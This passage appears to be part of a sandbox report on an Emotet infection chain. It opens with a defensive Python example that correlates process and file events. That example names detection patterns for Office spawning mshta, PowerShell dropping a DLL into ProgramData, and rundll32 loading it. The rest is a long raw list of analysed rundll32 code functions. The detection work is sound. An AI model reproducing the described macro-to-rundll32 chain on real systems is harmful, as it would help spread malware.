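The System Summary rows above record the infection chain in separate pieces: an Excel 4.0 macro sheet (Macro3) that references mshta and uses EXEC, a lure telling the victim to press "ENABLE EDITING" and "ENABLE CONTENT", powershell.exe writing C:\ProgramData\Milossd.dll, and rundll32.exe executing what Yara identifies as Emotet. On an endpoint, the same chain is visible as a parent-child sequence in process-creation and file-creation telemetry. The Python below is an added example, not part of the Joe Sandbox report, showing how to express each link as a rule and then correlate the links through the process tree, so that a single alert names the whole lineage rather than four disconnected events. The telemetry is constructed in a Sysmon-like shape (event 1 = process create, 11 = file create); PIDs, the explorer and EXCEL paths, the .hta path, the encoded PowerShell argument and the rundll32 export name are placeholders, while Milossd.dll is the file name the report records.

```python
import ntpath

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
PE_EXT = {".dll", ".exe"}
PROGRAMDATA = "c:\\programdata\\"

# Constructed telemetry. Event 1 = process create, 11 = file create. PIDs, most paths
# and command-line arguments are made up; Milossd.dll is the file name from the report.
EVENTS = [
    {"ev": 1, "pid": 4040, "ppid": 1000, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"ev": 1, "pid": 3020, "ppid": 4040,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "cmd": r'"EXCEL.EXE" C:\Users\user\Desktop\DOCUMENT_2801.xls'},
    {"ev": 1, "pid": 3104, "ppid": 3020, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\ProgramData\stage.hta"},                       # .hta path is a placeholder
    {"ev": 1, "pid": 3180, "ppid": 3104,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -enc <placeholder>"},
    {"ev": 11, "pid": 3180, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\ProgramData\Milossd.dll"},
    {"ev": 1, "pid": 3250, "ppid": 3180, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmd": r"rundll32.exe C:\ProgramData\Milossd.dll,EntryPoint"},       # export name is a placeholder
    # Benign control: rundll32 loading a System32 DLL must not trip any rule.
    {"ev": 1, "pid": 5100, "ppid": 900, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]


def basename(path):
    return ntpath.basename(path).lower()


def parent_of(ev, by_pid):
    return by_pid.get(ev.get("ppid"))


def rule_office_spawns_mshta(ev, by_pid):
    p = parent_of(ev, by_pid)
    return bool(ev["ev"] == 1 and basename(ev["image"]) == "mshta.exe" and p and basename(p["image"]) in OFFICE)


def rule_mshta_spawns_shell(ev, by_pid):
    p = parent_of(ev, by_pid)
    return bool(ev["ev"] == 1 and basename(ev["image"]) in SHELLS and p and basename(p["image"]) == "mshta.exe")


def rule_powershell_drops_pe(ev, by_pid):
    # File-create by PowerShell of a .dll/.exe under C:\ProgramData
    return bool(ev["ev"] == 11 and basename(ev["image"]) in {"powershell.exe", "pwsh.exe"}
                and ev["target"].lower().startswith(PROGRAMDATA)
                and ntpath.splitext(ev["target"])[1].lower() in PE_EXT)


def rule_rundll32_programdata(ev, by_pid):
    return bool(ev["ev"] == 1 and basename(ev["image"]) == "rundll32.exe" and PROGRAMDATA in ev["cmd"].lower())


RULES = {
    "office-spawns-mshta": rule_office_spawns_mshta,
    "mshta-spawns-shell": rule_mshta_spawns_shell,
    "powershell-drops-pe-programdata": rule_powershell_drops_pe,
    "rundll32-loads-programdata-dll": rule_rundll32_programdata,
}


def lineage(pid, by_pid, limit=16):
    """Image names from the given process up through its ancestors (child first)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < limit:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid].get("ppid")
    return chain


def analyze(events):
    """Return (per-event findings, correlated Office->mshta->...->rundll32 chains)."""
    by_pid = {e["pid"]: e for e in events if e["ev"] == 1}
    findings = [(name, e["pid"]) for e in events for name, fn in RULES.items() if fn(e, by_pid)]
    chains = []
    for e in events:
        if e["ev"] == 1 and rule_rundll32_programdata(e, by_pid):
            lin = lineage(e["pid"], by_pid)
            office_idx = [i for i, name in enumerate(lin) if name in OFFICE]
            if office_idx and "mshta.exe" in lin[:office_idx[-1]]:
                chains.append(lin[:office_idx[-1] + 1])  # trim at the Office ancestor
    return findings, chains


if __name__ == "__main__":
    found, chained = analyze(EVENTS)
    for name, pid in found:
        print(f"[rule] {name} pid={pid}")
    for c in chained:
        print("[chain] " + " <- ".join(c))
```

Each rule on its own is noisy in a large estate (administrators do run rundll32 against DLLs in odd places); the correlation step is what lifts the finding to high confidence, because a rundll32 whose ancestry runs through mshta.exe back to an Office process has no legitimate explanation.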
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B9700
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C5CF9
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C5040
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B6083
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C109E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B70ED
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B911A
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002CA156
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BF154
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C41A7
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C9186
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C026B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BE243
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C129C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BC309
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002CC38F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002CB391
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002CD3C8
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C542E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002CA429
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BB41A
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002D146E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C04B8
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002CE498
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B44FA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C64F1
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C74DD
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002D04DE
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C3512
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BF58F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C45CD
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C363D
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C561F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002D3672
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B8650
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B472E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B777B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C2753
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BB821
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B2830
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C1831
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BE86A
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C6864
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002D0867
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BC850
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B88F4
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B68DE
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002CD8D7
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BF93D
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B194C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C0946
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B1950
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002CC9A9
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C99AA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002D1993
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B6A1F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B9A7D
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BCA43
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BAB66
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BBB4B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002D1B54
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C4B56
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B7B82
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002CEBFF
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C2BF6
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C7BCA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B6C29
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002CCC89
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BEC9B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002CACD3
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C0D33
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BBD0F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C8D71
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002C3D41
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002D0D5B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BFD8C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B8D95
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002CBE8C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BAE9A
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002CEE94
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B6ED6
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002CFF31
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B2FA1
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B3FB8
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002B1F9B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002BCFCE
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00815483
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082C089
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082B28C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082E294
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081E09B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082D898
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081A29A
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082049E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082069C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081F8B8
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082A0D3
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082CCD7
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_008162D6
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082F8DE
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00815CDE
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_008268DD
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_008164ED
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_008258F1
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00817CF4
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_008138FA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_008250F9
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081A81A
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00824A1F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00815E1F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081AC21
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00816029
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00829829
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082482E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00811C30
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00820C31
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00822A3D
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081BE43
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00824440
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081D643
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081BC50
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00817A50
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082FC67
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00825C64
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081F66B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081DC6A
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0083086E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00832A72
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00818E7D
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00816F82
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00828586
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082B78F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081F18C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081E98F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00830D93
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082A791
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00818195
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081139B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_008123A1
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_008235A7
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00828DAA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082BDA9
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_008133B8
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00826FCA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082C7C8
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_008239CD
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081C3CE
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00821FF6
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082DFFF
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00818B00
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081B709
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081B10F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00822912
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081851A
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00813B2E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00820133
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0082F331
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081ED3D
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00823141
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081FD46
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081AF4B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00810D4C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00810D50
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00821B53
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00829556
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00823F56
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0081E554
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00830F54
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0083015B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00819F66
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00828171
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00816B7B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00745CF9
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_007370ED
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_007474DD
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074EE94
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074E498
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00751B54
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073F93D
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00743512
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00739700
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074B391
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00738D95
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00753672
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00739A7D
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00746864
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00750867
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073E86A
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0075146E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074026B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073C850
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00738650
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073CA43
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073E243
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00745040
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00732830
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00741831
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074363D
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073B821
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00736C29
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074542E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074A429
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073B41A
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074561F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00736A1F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_007464F1
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_007388F4
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_007344FA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00736ED6
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_007504DE
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_007368DE
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_007404B8
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074129C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074109E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00736083
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074CC89
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00748D71
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073777B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073AB66
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074A156
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00744B56
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00731950
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073F154
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00742753
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00750D5B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00740946
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00743D41
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073194C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074FF31
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00740D33
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073472E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073911A
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073C309
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00742BF6
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_007445CD
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00747BCA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00733FB8
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00732FA1
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_007441A7
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_007499AA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00751993
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00731F9B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00737B82
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_00749186
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0074C38F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073F58F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0073FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00609700
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00615CF9
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00615040
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_006070ED
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00606083
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061109E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060F154
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061A156
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060911A
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_006141A7
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00619186
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061026B
